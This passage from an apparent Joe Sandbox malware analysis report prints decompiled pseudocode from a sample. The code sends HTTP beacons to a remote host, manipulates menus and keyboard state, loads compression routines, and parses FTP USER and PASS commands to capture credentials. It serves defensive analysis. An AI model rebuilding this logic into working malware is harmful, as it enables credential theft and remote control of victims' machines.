    					_t64 = 0;
    					L23:
    					return _t64;
    				}
    			}




























    APIs
    • TlsAlloc.KERNEL32 ref: 012CEBB0
    • RegisterWindowMessageW.USER32(?,00000000), ref: 012CEBDA
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: AllocMessageRegisterWindow
    • String ID:
    • API String ID: 339627511-0
    • Opcode ID: 8e21b35a6025d72ca13a3161ebeea9741df9f050df8c6f99673925c49d46f3c7
    • Instruction ID: 445bceef73085f6d194b3ea75c96855b6bb530918c7d242a49fd0d0cb00c47e6
    • Opcode Fuzzy Hash: 8e21b35a6025d72ca13a3161ebeea9741df9f050df8c6f99673925c49d46f3c7
    • Instruction Fuzzy Hash: 3F619C75910745AFDB20AFB4DC88AAEBBBCFB18700F144A2DE242D7641EB75A545CB20
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 307 12c1ff5-12c204f call 12b175d lstrcpyW call 12b1abe call 12b101e call 12b16ae 316 12c2074-12c2083 call 12b1933 307->316 317 12c2051-12c2067 call 12b1465 307->317 322 12c2149-12c214c 316->322 323 12c2089 316->323 324 12c206c-12c206f call 12b1406 317->324 325 12c2069 317->325 327 12c2257-12c2269 call 12b1933 322->327 328 12c2152-12c2163 call 12b1780 322->328 326 12c208e-12c209b 323->326 324->316 325->324 326->326 330 12c209d-12c20a7 call 12b1afa 326->330 336 12c2169-12c2185 call 12b137f call 12b14ec 328->336 337 12c2246-12c224a 328->337 330->327 340 12c20ad-12c20ce call 12b137f call 12b177b 330->340 349 12c21a7-12c21be call 12b1609 336->349 350 12c2187-12c218d 336->350 337->327 341 12c224c-12c2252 call 12b1483 337->341 340->327 354 12c20d4-12c20e6 call 12b170d 340->354 341->327 359 12c223e-12c2241 call 12b1492 349->359 360 12c21c0-12c21dc call 12b166d 349->360 352 12c219a-12c21a5 call 12b14e7 350->352 352->349 363 12c218f-12c2194 Sleep 352->363 365 12c20ef-12c20fb call 12b17cb 354->365 366 12c20e8 354->366 359->337 360->359 369 12c21de-12c220c call 12b137f CreateEventW 360->369 363->352 372 12c20fd call 12c1a81 365->372 373 12c2102-12c2128 call 12b137f OpenEventW 365->373 366->365 377 12c220e-12c2215 WaitForSingleObject 369->377 378 12c2217-12c221e WaitForMultipleObjects 369->378 372->373 381 12c212a-12c2132 SetEvent CloseHandle 373->381 382 12c2134-12c2144 call 12b15a5 CloseHandle 373->382 380 12c2224-12c222d 377->380 378->380 383 12c222f-12c2232 CloseHandle 380->383 384 12c2234-12c223c CloseHandle * 2 380->384 381->382 382->327 383->384 384->359
    C-Code - Quality: 93%
    			E012C1FF5(void* __eflags) {
    				WCHAR* _t54;
    				void* _t62;
    				void* _t65;
    				char _t66;
    				void* _t73;
    				intOrPtr* _t81;
    				void* _t84;
    				intOrPtr _t96;
    				WCHAR* _t109;
    				void* _t125;
    				signed int _t139;
    				signed int _t141;
    				void* _t142;
    				void* _t148;
    				void* _t150;
    				void* _t152;
    
    				_t150 = _t152 - 0x74;
    				_push(_t139);
    				 *((char*)(_t150 + 0x73)) = 0;
    				 *((intOrPtr*)(_t150 + 0x6c)) = 0;
    				_t54 = L012B175D(0xff);
    				_t144 = _t54;
    				lstrcpyW(_t54,  *0x12dc7ec);
    				_t125 = 0x5c;
    				 *((short*)(L012B1ABE(_t54, _t125) + 2)) = 0;
    				L012B101E(_t54, 6);
    				if(L012B16AE(_t144, _t150 + 0x50, 0) != 0) {
    					 *((intOrPtr*)(_t150 + 0x6c)) =  *((intOrPtr*)(_t150 + 0x54));
    					_t96 = L012B1465( *((intOrPtr*)(_t150 + 0x50)), _t150 + 0x6c);
    					 *((intOrPtr*)(_t150 + 0x5c)) = _t96;
    					if(_t96 == 0) {
    						 *((intOrPtr*)(_t150 + 0x6c)) = 0;
    					}
    					L012B1406(_t150 + 0x50);
    				}
    				L012B1933(_t144);
    				if( *((intOrPtr*)(_t150 + 0x6c)) != 0x1e6) {
    					if( *((intOrPtr*)(_t150 + 0x6c)) != 0) {
    						L33:
    						L012B1933( *((intOrPtr*)(_t150 + 0x5c)));
    						return  *((intOrPtr*)(_t150 + 0x73));
    					}
    					_t62 = L012B1780(0x8889347b, 2);
    					 *(_t150 + 0x68) = _t62;
    					if(_t62 == 0) {
    						L31:
    						if( *((char*)(_t150 + 0x7c)) == 1) {
    							_t109 =  *0x12dc7ec; // 0x0
    							L012B1483(_t109);
    						}
    						goto L33;
    					}
    					L012B137F(0x19367401, _t150 - 0x24, 1);
    					_t65 = L012B14EC(_t150 - 0x24);
    					_t141 = _t139 | 0xffffffff;
    					if(_t65 == 0) {
    						L22:
    						_t66 = L012B1609(0x12dc7f0, _t150 - 0x2a0);
    						 *((char*)(_t150 + 0x73)) = _t66;
    						if(_t66 == 1) {
    							 *((char*)(_t150 + 0x73)) = L012B166D(_t150 - 0x2a0, 0, 0x12dc7f0, 0, _t150 + 0x40) != 0;
    							if( *((intOrPtr*)(_t150 + 0x73)) != 0) {
    								L012B137F(0x1a43533f, _t150 - 0x24, 1);
    								 *(_t150 + 0x60) = CreateEventW(0x12dc7c8, 1, 0, _t150 - 0x24);
    								_t73 =  *(_t150 + 0x40);
    								 *(_t150 + 0x64) = _t73;
    								_push(_t141);
    								if( *(_t150 + 0x60) != 0) {
    									WaitForMultipleObjects(2, _t150 + 0x60, 0, ??);
    								} else {
    									WaitForSingleObject(_t73, ??);
    								}
    								if( *(_t150 + 0x60) != 0) {
    									CloseHandle( *(_t150 + 0x60));
    								}
    								CloseHandle( *(_t150 + 0x44));
    								CloseHandle( *(_t150 + 0x40));
    							}
    						}
    						L012B1492( *(_t150 + 0x68));
    						goto L31;
    					}
    					_t148 = GetFileAttributesExW;
    					while(L012B14E7(_t141, _t148) == 0) {
    						Sleep(0x1f4);
    					}
    					goto L22;
    				}
    				_t81 = 0x12dc76c;
    				do {
    					 *((intOrPtr*)(_t81 - 0x14)) = 0;
    					 *_t81 = 0;
    					_t81 = _t81 + 4;
    				} while (_t81 < 0x12dc780);
    				if(L012B1AFA( *((intOrPtr*)(_t150 + 0x5c)), 0x1e6) != 0) {
    					L012B137F(0x32901130, _t150 - 0x24, 1);
    					_t84 = L012B177B(0x12dc7c8, _t150 - 0x24);
    					 *(_t150 + 0x68) = _t84;
    					if(_t84 != 0) {
    						L012B170D(_t150 - 0x98);
    						if(( *(_t150 - 0x98) & 0x00000020) != 0) {
    							 *0x12dc738 =  *0x12dc738 | 0x00000010;
    						}
    						L012B17CB();
    						if(( *0x12dc738 & 0x00000010) != 0) {
    							E012C1A81();
    						}
    						_t137 = _t150 - 0x24;
    						L012B137F(0x1a43533f, _t150 - 0x24, 1);
    						_t142 = OpenEventW(2, 0, _t150 - 0x24);
    						if(_t142 != 0) {
    							SetEvent(_t142);
    							CloseHandle(_t142);
    						}
    						L012B15A5(1, _t137);
    						 *((char*)(_t150 + 0x73)) = 1;
    						CloseHandle( *(_t150 + 0x68));
    					}
    				}
    				goto L33;
    			}




















    APIs
    • lstrcpyW.KERNEL32 ref: 012C201E
    • OpenEventW.KERNEL32(00000002,00000000,?,00000001,00000001,00000000,00000006,?,?,00000000), ref: 012C2118
    • SetEvent.KERNEL32(00000000,?,?,00000000), ref: 012C212B
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 012C2132
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 012C2142
    • Sleep.KERNEL32(000001F4,00000001,00000000,00000006,?,?,00000000), ref: 012C2194
    • CreateEventW.KERNEL32(012DC7C8,00000001,00000000,?,00000001,?,012DC7F0,00000000,?,00000001,00000000,00000006,?,?,00000000), ref: 012C21F9
    • WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 012C220F
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?,?,?,00000000), ref: 012C221E
    • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 012C2232
    • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 012C2237
    • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 012C223C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CloseHandle$Event$Wait$CreateMultipleObjectObjectsOpenSingleSleeplstrcpy
    • String ID: o.d
    • API String ID: 3864132990-4245879138
    • Opcode ID: 8386d1a1ead2ed41cf0b18dbf9461066a6472dbc44a1e1b491d406b8389e860f
    • Instruction ID: d59451e41147f4c5e190c51915be28991543ee5088c478d3e7b857e9d363eff9
    • Opcode Fuzzy Hash: 8386d1a1ead2ed41cf0b18dbf9461066a6472dbc44a1e1b491d406b8389e860f
    • Instruction Fuzzy Hash: 4C61003192024ACFEB14EF64E898AFD3BAAEF55740F00412DEB059B291DFB18D05CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 96%
    			E012C50BC(void _a4) {
    				long _v8;
    				char* _v12;
    				void* _v16;
    				intOrPtr _v20;
    				void* _v24;
    				char _v26;
    				short _v28;
    				char* _v36;
    				char* _v40;
    				char _v52;
    				char _v60;
    				char _v544;
    				char _v548;
    				void* _t50;
    				void* _t54;
    				void* _t56;
    				intOrPtr _t58;
    				void* _t59;
    				intOrPtr _t66;
    				void* _t85;
    				void* _t89;
    				char* _t93;
    				void* _t95;
    				void* _t96;
    				void* _t114;
    				intOrPtr* _t115;
    				intOrPtr* _t117;
    				void* _t119;
    
    				L012B1654(_t50);
    				_t115 = _a4;
    				if(L012B12F8( *((intOrPtr*)(_t115 + 4)),  &_v40) == 0) {
    					L22:
    					return 0;
    				}
    				_t54 = InternetOpenA( *0x12dca04, 0, 0, 0, 0);
    				_v24 = _t54;
    				if(_t54 == 0) {
    					L21:
    					L012B11C2( &_v40);
    					goto L22;
    				}
    				_t56 = InternetConnectA(_t54, _v40, _v28, 0, 0, 3, 0, 0);
    				_v16 = _t56;
    				if(_t56 == 0) {
    					L20:
    					InternetCloseHandle(_v24);
    					goto L21;
    				}
    				_t58 =  *_t115;
    				_t93 = "POST";
    				if( *((char*)(_t58 + 0x18)) != 1) {
    					_t93 = "GET";
    				}
    				_t59 = HttpOpenRequestA(_v16, _t93, _v36, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v26 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
    				_v8 = _t59;
    				if(_t59 == 0) {
    					L19:
    					InternetCloseHandle(_v16);
    					goto L20;
    				} else {
    					L012B11AE( &_v548);
    					_t95 = 0xf;
    					L012B165E(_t95,  &_v60);
    					_t63 =  *_t115;
    					if( *((intOrPtr*)( *_t115 + 0x20)) > 0) {
    						_t85 = L012B128F( &_v12,  &_v60,  *((intOrPtr*)(_t63 + 0x1c)));
    						_t119 = _t119 + 0xc;
    						if(_t85 > 0) {
    							HttpAddRequestHeadersA(_v8, _v12, 0xffffffff, 0xa0000000);
    							L012B1933(_v12);
    						}
    					}
    					_t96 = 0x10;
    					L012B165E(_t96,  &_v52);
    					_t66 = L012B11D6( &_v544, L012B18B6( &_v544));
    					_v20 = _t66;
    					if(_t66 != 0 && L012B128F( &_v12,  &_v52, _t66) > 0) {
    						HttpAddRequestHeadersA(_v8, _v12, 0xffffffff, 0xa0000000);
    						L012B1933(_v12);
    					}
    					L012B1933(_v20);
    					_t117 = _a4;
    					_t89 = _v8;
    					if(HttpSendRequestA(_t89, 0, 0,  *( *_t117 + 0x24),  *( *_t117 + 0x28)) != 1) {
    						L18:
    						InternetCloseHandle(_t89);
    						goto L19;
    					} else {
    						_v8 = 4;
    						_a4 = 0;
    						if(HttpQueryInfoA(_t89, 0x20000013,  &_a4,  &_v8, 0) != 1 || _a4 != 0xc8) {
    							goto L18;
    						} else {
    							_push( &_v8);
    							_t114 = 0x22;
    							if(L012B10F0(_t89, _t114) != 0) {
    								L012B1933(_t75);
    							}
    							L012B11C2( &_v40);
    							 *(_t117 + 8) = _t89;
    							goto L22;
    						}
    					}
    				}
    			}
































    APIs
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 012C50F1
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 012C510F
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 012C515A
    • HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 012C51B3
    • HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 012C5205
    • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 012C5228
    • HttpQueryInfoA.WININET(?,20000013,?,?,00000000), ref: 012C524C
    • InternetCloseHandle.WININET(?), ref: 012C5287
    • InternetCloseHandle.WININET(?), ref: 012C5290
    • InternetCloseHandle.WININET(?), ref: 012C5299
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: HttpInternet$Request$CloseHandle$HeadersOpen$ConnectInfoQuerySend
    • String ID: GET$HTTP/1.1$POST
    • API String ID: 585491181-2753618334
    • Opcode ID: e23d1a1db9fce710a3186ed0a84a7c0fabb7d3229b3a7bfd801881708de18395
    • Instruction ID: b339ee10d29b51a45b1463114e01e9c55fd8da53762dd2961dc4845f96ecc63b
    • Opcode Fuzzy Hash: e23d1a1db9fce710a3186ed0a84a7c0fabb7d3229b3a7bfd801881708de18395
    • Instruction Fuzzy Hash: 0D51CC71A1111ABFDB20EBA0ED88DEEBFBAFF14790F104155F605A6154DB30EA50CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 438 12cf213-12cf222 439 12cf228 438->439 440 12cf38b-12cf391 SetKeyboardState 438->440 442 12cf35e-12cf389 call 12b1663 439->442 443 12cf22e-12cf231 439->443 441 12cf397-12cf3a9 SetEvent 440->441 442->441 443->442 445 12cf237-12cf244 GetMenu 443->445 445->441 447 12cf24a-12cf261 GetMenuItemCount 445->447 448 12cf285-12cf2a5 MenuItemFromPoint 447->448 449 12cf263-12cf26e GetMenuState 447->449 448->441 452 12cf2ab-12cf2ba GetMenuState 448->452 450 12cf27f-12cf283 449->450 451 12cf270-12cf27c HiliteMenuItem 449->451 450->448 450->449 451->450 453 12cf2bc EndMenu 452->453 454 12cf2c2-12cf2d6 HiliteMenuItem 452->454 453->454 454->441 455 12cf2dc-12cf2e0 454->455 455->441 456 12cf2e6-12cf2ea 455->456 457 12cf2ec-12cf2f8 GetSubMenu 456->457 458 12cf32e-12cf335 456->458 457->441 459 12cf2fe-12cf30f GetMenuItemRect 457->459 460 12cf33b-12cf346 GetMenuItemID 458->460 461 12cf337-12cf339 458->461 459->441 462 12cf315-12cf32c TrackPopupMenuEx 459->462 460->441 463 12cf348-12cf35c SendMessageW 460->463 461->463 462->441 463->441
    C-Code - Quality: 93%
    			E012CF213(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
    				signed int _v8;
    				signed int _v12;
    				struct tagRECT _v28;
    				signed short _t37;
    				int _t46;
    				BYTE* _t47;
    				signed short _t51;
    				int _t63;
    				int _t64;
    				unsigned int _t65;
    				struct HMENU__* _t72;
    				struct HMENU__* _t76;
    				void* _t79;
    
    				_t65 = __ecx;
    				_t37 = _a8;
    				_t79 = _t37 - 0xfffffffd;
    				if(_t79 == 0) {
    					SetKeyboardState( *0x12dd848);
    					L23:
    					SetEvent( *0x12dd844);
    					return 0;
    				}
    				if(_t79 <= 0 || _t37 > 0xffffffff) {
    					_v28.top = _t37 >> 0x10;
    					_v28.right = _t65 & 0x0000ffff;
    					_push(0);
    					_v28.left = _t37 & 0x0000ffff;
    					_v28.bottom = _t65 >> 0x10;
    					_push( &_v28);
    					L012B1663(0x12dd838, _a4);
    					goto L23;
    				} else {
    					_t72 = GetMenu(_a4);
    					if(_t72 == 0) {
    						goto L23;
    					}
    					_v12 = _v12 | 0xffffffff;
    					_t46 = GetMenuItemCount(_t72);
    					_t63 = 0;
    					_v8 = _t46;
    					if(_t46 <= 0) {
    						L8:
    						_t47 =  *0x12dd848;
    						_push(_t47[0x104]);
    						_t64 = MenuItemFromPoint(_a4, _t72, _t47[0x100]);
    						if(_t64 == 0xffffffff) {
    							goto L23;
    						}
    						_v8 = GetMenuState(_t72, _t64, 0x400);
    						if(_v12 != _t64) {
    							EndMenu();
    						}
    						HiliteMenuItem(_a4, _t72, _t64, 0x480);
    						if(_a8 != 0xfffffffe && (_v8 & 0x00000003) == 0) {
    							if((_v8 & 0x00000010) == 0) {
    								if((_v8 & 0x00000800) == 0) {
    									_t51 = GetMenuItemID(_t72, _t64);
    									if(_t51 == 0xffffffff) {
    										goto L23;
    									}
    									L20:
    									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
    									goto L23;
    								}
    								_t51 = 0;
    								goto L20;
    							}
    							_t76 = GetSubMenu(_t72, _t64);
    							if(_t76 != 0 && GetMenuItemRect(_a4, _t72, _t64,  &_v28) != 0) {
    								TrackPopupMenuEx(_t76, 0x4000, _v28, _v28.bottom, _a4, 0);
    							}
    						}
    						goto L23;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						if(GetMenuState(_t72, _t63, 0x400) < 0) {
    							HiliteMenuItem(_a4, _t72, _t63, 0x400);
    							_v12 = _t63;
    						}
    						_t63 = _t63 + 1;
    					} while (_t63 < _v8);
    					goto L8;
    				}
    			}

















    APIs
    • GetMenu.USER32(?), ref: 012CF23A
    • GetMenuItemCount.USER32 ref: 012CF24F
    • GetMenuState.USER32 ref: 012CF266
    • HiliteMenuItem.USER32(000000FF,00000000,00000000,00000400), ref: 012CF276
    • MenuItemFromPoint.USER32(000000FF,00000000,?,?), ref: 012CF29A
    • GetMenuState.USER32 ref: 012CF2AE
    • EndMenu.USER32 ref: 012CF2BC
    • HiliteMenuItem.USER32(000000FF,00000000,00000000,00000480), ref: 012CF2CC
    • GetSubMenu.USER32 ref: 012CF2EE
    • GetMenuItemRect.USER32(000000FF,00000000,00000000,?), ref: 012CF307
    • TrackPopupMenuEx.USER32(00000000,00004000,?,000000FE,000000FF,00000000), ref: 012CF326
    • GetMenuItemID.USER32(00000000,00000000), ref: 012CF33D
    • SendMessageW.USER32(000000FF,00000111,?,00000000), ref: 012CF356
    • SetKeyboardState.USER32 ref: 012CF391
    • SetEvent.KERNEL32 ref: 012CF39D
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
    • String ID:
    • API String ID: 751066993-0
    • Opcode ID: d53b2d8a1b6b19561ed7eaeaa786b0275065150ba085fe4c87fea5bdb67341cb
    • Instruction ID: 876d4073d5332bfde3697c12674c35e61c0e34987bc242330568a70de18be483
    • Opcode Fuzzy Hash: d53b2d8a1b6b19561ed7eaeaa786b0275065150ba085fe4c87fea5bdb67341cb
    • Instruction Fuzzy Hash: 09418234811249BFDB214F68EE4DABE3EBAEB45B65F148218FB55D31D4C7308A42DB60
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    C-Code - Quality: 100%
    			E012B78EC() {
    				struct HINSTANCE__* _t2;
    				_Unknown_base(*)()* _t7;
    				void* _t9;
    				intOrPtr _t14;
    				intOrPtr _t16;
    				intOrPtr _t17;
    				intOrPtr _t18;
    
    				_t14 =  *0x12dc358; // 0x0
    				if(_t14 != 0) {
    					L9:
    					 *0x12dc358 =  *0x12dc358 + 1;
    					return 1;
    				} else {
    					_t2 = LoadLibraryA("cabinet.dll");
    					 *0x12dc354 = _t2;
    					if(_t2 == 0) {
    						L8:
    						return 0;
    					} else {
    						 *0x12db97c = GetProcAddress(_t2, "FCICreate");
    						 *0x12dc344 = GetProcAddress( *0x12dc354, "FCIAddFile");
    						 *0x12db574 = GetProcAddress( *0x12dc354, "FCIFlushCabinet");
    						_t7 = GetProcAddress( *0x12dc354, "FCIDestroy");
    						 *0x12dc34c = _t7;
    						_t16 =  *0x12db97c; // 0x0
    						if(_t16 == 0) {
    							L7:
    							FreeLibrary( *0x12dc354);
    							goto L8;
    						} else {
    							_t17 =  *0x12dc344; // 0x0
    							if(_t17 == 0) {
    								goto L7;
    							} else {
    								_t18 =  *0x12db574; // 0x0
    								if(_t18 == 0 || _t7 == 0) {
    									goto L7;
    								} else {
    									_t9 = HeapCreate(0, 0x80000, 0);
    									 *0x12db570 = _t9;
    									if(_t9 != 0) {
    										goto L9;
    									} else {
    										goto L7;
    									}
    								}
    							}
    						}
    					}
    				}
    			}











    APIs
    • LoadLibraryA.KERNEL32(cabinet.dll,?,012BC7AE), ref: 012B7900
    • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 012B7920
    • GetProcAddress.KERNEL32(FCIAddFile), ref: 012B7932
    • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 012B7944
    • GetProcAddress.KERNEL32(FCIDestroy), ref: 012B7956
    • HeapCreate.KERNEL32(00000000,00080000,00000000,?,012BC7AE), ref: 012B7981
    • FreeLibrary.KERNEL32(?,012BC7AE), ref: 012B7996
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: AddressProc$Library$CreateFreeHeapLoad
    • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
    • API String ID: 2040708800-1163896595
    • Opcode ID: 4c332c532f65f9729faa8573fb4e13c0b47300f495f624fe9852bebf73d32add
    • Instruction ID: 83414180bce6c7d3ad76d6abf859a4718cbe55c439510a7b8a30238f7a17c180
    • Opcode Fuzzy Hash: 4c332c532f65f9729faa8573fb4e13c0b47300f495f624fe9852bebf73d32add
    • Instruction Fuzzy Hash: D6115B30D63B11EAEB725F3DFD4D5A93FA4E789B50359052EE6109224CDE350095CF41
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E012C4060(void* __eax, char* __ecx) {
    				intOrPtr _t39;
    				void* _t46;
    				char _t57;
    				intOrPtr _t58;
    				intOrPtr _t59;
    				void* _t69;
    				intOrPtr _t71;
    				signed char _t72;
    				intOrPtr _t73;
    				void* _t75;
    				void* _t78;
    				void* _t79;
    				void* _t81;
    				void* _t89;
    				char* _t91;
    				char _t93;
    				void* _t96;
    				void* _t97;
    				intOrPtr* _t98;
    				void* _t99;
    				void* _t101;
    
    				_t99 = _t101 - 0x74;
    				_t69 = __eax;
    				_t91 = __ecx;
    				if( *((intOrPtr*)(_t99 + 0x7c)) == 0xffffffff || __ecx == 0 || __eax > 0x200) {
    					L51:
    					_t39 = 0;
    				} else {
    					if(__eax <= 6) {
    						L24:
    						if(_t69 <= 1) {
    							goto L51;
    						} else {
    							EnterCriticalSection(0x12dd050);
    							_t96 = E012C3F58( *((intOrPtr*)(_t99 + 0x7c)));
    							if(_t96 != 0) {
    								if( *((intOrPtr*)(_t96 + 4)) == 0 ||  *((intOrPtr*)(_t96 + 8)) == 0) {
    									_push(0);
    									goto L49;
    								} else {
    									if(_t69 < 3) {
    										L33:
    										if(_t69 >= 4) {
    											_t93 =  *_t91;
    											if(_t93 == 0x45505954 || _t93 == 0x54414546 || _t93 == 0x56534150) {
    												goto L37;
    											} else {
    												if(_t93 == 0x54415453 || _t93 == 0x5453494c) {
    													_t72 = 0x65;
    													_push(0x16);
    													goto L41;
    												}
    											}
    										}
    									} else {
    										_t57 =  *_t91;
    										if(_t57 == 0x43 || _t57 == 0x50) {
    											if( *((char*)(_t91 + 1)) != 0x57 ||  *((char*)(_t91 + 2)) != 0x44) {
    												goto L33;
    											} else {
    												L37:
    												_t72 = 0x64;
    												_push(0x15);
    												L41:
    												_pop(_t75);
    												L012B1479(_t75, _t99 + 0x60);
    												_t46 = _t99 - 0x40;
    												 *((intOrPtr*)(_t99 + 0x6c)) = 0x80;
    												__imp__#5( *((intOrPtr*)(_t99 + 0x7c)), _t46, _t99 + 0x6c);
    												if(_t46 == 0 && L012B15DC(_t99 - 0x40) == 0) {
    													if(_t72 == 0x65) {
    														L46:
    														L012B1A55(_t99 - 0x40, _t99 - 0x248);
    														_t78 = 0x14;
    														L012B1479(_t78, _t99 + 0x40);
    														_push(_t99 - 0x248);
    														_push( *((intOrPtr*)(_t96 + 8)));
    														_push( *((intOrPtr*)(_t96 + 4)));
    														L012B171C(_t72 & 0x000000ff, 0, 0, _t99 + 0x40, _t99 + 0x60);
    													} else {
    														if(_t72 == 0x64) {
    															_t79 = 0x17;
    															if(L012B1AA5(L012B1479(_t79, _t99 + 0x48),  *((intOrPtr*)(_t96 + 4)), _t99 + 0x48, 0xffffffff, 9) != 0) {
    																goto L46;
    															}
    														}
    													}
    												}
    												_push(0);
    												L49:
    												E012C3FF9(_t96);
    											}
    										} else {
    											goto L33;
    										}
    									}
    								}
    							}
    							_t71 = 0;
    							goto L23;
    						}
    					} else {
    						_t58 =  *((intOrPtr*)(__ecx));
    						if(_t58 == 0x52455355 || _t58 == 0x53534150) {
    							if( *((char*)(_t91 + 4)) != 0x20) {
    								goto L24;
    							} else {
    								_t97 = _t69 - 5;
    								_t89 = 0;
    								_t81 = _t91 + 5;
    								if(_t97 == 0) {
    									goto L51;
    								} else {
    									while(1) {
    										_t59 =  *((intOrPtr*)(_t89 + _t81));
    										if(_t59 == 0xd || _t59 == 0xa) {
    											break;
    										}
    										if(_t59 < 0x20) {
    											goto L51;
    										} else {
    											_t89 = _t89 + 1;
    											if(_t89 < _t97) {
    												continue;
    											} else {
